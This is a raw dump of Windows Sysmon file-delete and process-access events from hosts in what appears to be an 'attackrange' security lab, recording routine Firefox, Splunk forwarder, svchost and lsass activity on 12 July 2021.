Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=2CC4F840883F7C336D29BB52EC77F2A1,SHA256=5936891BF97AF294EFEF43026D23F4FD5F31DE2587AC40C1CA90E5B83475FA82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055214Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:08.593{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=E14F11C6EC3AF781513EE2E40CC6F187,SHA256=E34F06EB3306C48013E59CA49C2F4E4C85B17D9B0BD4DEE4A4328523461377F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055213Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:08.593{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=DCBEEB312CD3BCC3E5922DB8C9DDBA9C,SHA256=3B7AC5E9F36FC4A5E0E376800B780FEAFA1F7B67D0C2A50CE801DFFCAC5E69C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055212Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:08.593{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F3440D538FB575DED9BF702B26C10E4F,SHA256=A54E66A4B79434266BE867DFA40B83F334DD5A8C23550AED0DA57E5D778F8281,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055211Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:08.593{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=A13B11B186E84E6D2A8B467D79ADA732,SHA256=A26FC5E9EB16F63BAED669F04983E18B1CCDEEDD86E2C74DFA56C1422314B05C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055210Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:08.593{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C8CD69A52384E04B0BC5C4ED65093A47,SHA256=A32D08B57057CD5A5EACF8803CCF0B8E6A8C2CAAA2069160DAD1C02AB1749776,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055209Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:08.593{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=8FEBDEDE296490F89A03B4E4032097C1,SHA256=BF9ED3DE3395829767ECC44650DA0B1458D3C8192D05E1F280F75A9565FEF99B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055208Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:08.592{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=21A7BA611FF802A6EF7A1483C7955EAC,SHA256=C53A766A7B5D1D91DF93454A61EBEF5D5FFB595B99C5B874FC004F1C38D808BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055207Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:08.590{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=EB8449BB6F8754A1059BC2D4A88441CE,SHA256=F6456A9BDC85A4E99560F130BBFCCC4F3EFEDEB00DCBC157217FA280E6A0962F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055206Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:08.589{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=01BF6DECFCB3DADE88253728373E56FA,SHA256=1FC10D9712B80ED03722FBB9602785FA1B9879426D552EFB809A3EA68D797E30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055218Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:09.824{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1781185A5792BB1777B090A5424580E,SHA256=2F42C051EF4A920E4DDEFC27FF0B58A47F21DB5D3FE9C370FB38D8388C400FF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810604Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:09.042{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0026AFC9415ED4E81FF73C0C99706A05,SHA256=5C1AF4F75B805D3268F27A0203A11999D9F9A604111A4AC11BA1607EDE10CAA9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055233Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:10.954{466BC892-02AF-60E8-0D00-00000000CF01}9005708C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055232Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:10.954{466BC892-02AF-60E8-0D00-00000000CF01}9005708C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001055231Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:10.954{466BC892-02AF-60E8-0D00-00000000CF01}9005708C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055230Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:10.954{466BC892-02AF-60E8-0D00-00000000CF01}9005708C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055229Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:10.954{466BC892-02AF-60E8-0D00-00000000CF01}9005708C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001055228Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:10.954{466BC892-02AF-60E8-0D00-00000000CF01}9005708C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055227Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:10.954{466BC892-02AF-60E8-0D00-00000000CF01}9005708C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055226Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:10.954{466BC892-02AF-60E8-0D00-00000000CF01}9005708C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001055225Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:10.954{466BC892-02AF-60E8-0D00-00000000CF01}9005708C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055224Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:10.954{466BC892-02AF-60E8-0D00-00000000CF01}9005708C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055223Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:10.954{466BC892-02AF-60E8-0D00-00000000CF01}9005708C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001055222Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:10.954{466BC892-02AF-60E8-0D00-00000000CF01}9005708C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055221Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:10.954{466BC892-02AF-60E8-0D00-00000000CF01}9005708C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055220Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:10.954{466BC892-02AF-60E8-0D00-00000000CF01}9005708C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
23542300x80000000000000001055219Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:10.839{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98100C2B32CDC85CD86303E124025B03,SHA256=66E670FC97DEDFABFCDEEB7798B385ADA68247DB6F918E6A1413FA4DF48364A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810605Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:10.073{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42F9E5CFB07A66F8F28C10A9092DE9EF,SHA256=8AA2E5A8815CABF32C44594D56A1735FBE6B8CF8F64A1E95CE748B955BE06A6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055235Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:11.891{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1CD77D678DEBE68D91C9D59B633B697A,SHA256=7F0E2C97A4996122AF26CA3A388B5FD4530E5E8D1148D68B7DACADA6316D6E45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810606Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:11.105{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB3204F55A78C19705D3C058A8D18D80,SHA256=78BFE71E4C1A2D8545703C1F06D8F5F8B57B3D9EE9B8BFAEB48071E7F3159148,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055234Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:11.539{466BC892-02AD-60E8-0B00-00000000CF01}624808C:\Windows\system32\lsass.exe{466BC892-02AB-60E8-0100-00000000CF01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x80000000000000001055237Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:12.922{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9EBCDAA56138027E3BF01EE6632D18A8,SHA256=5808C555746F754A064E6B09B624766EB49C5BF4796AE6C5DDF95DBD86E6D665,IMPHASH=00000000000000000000000000000000falsetrue 
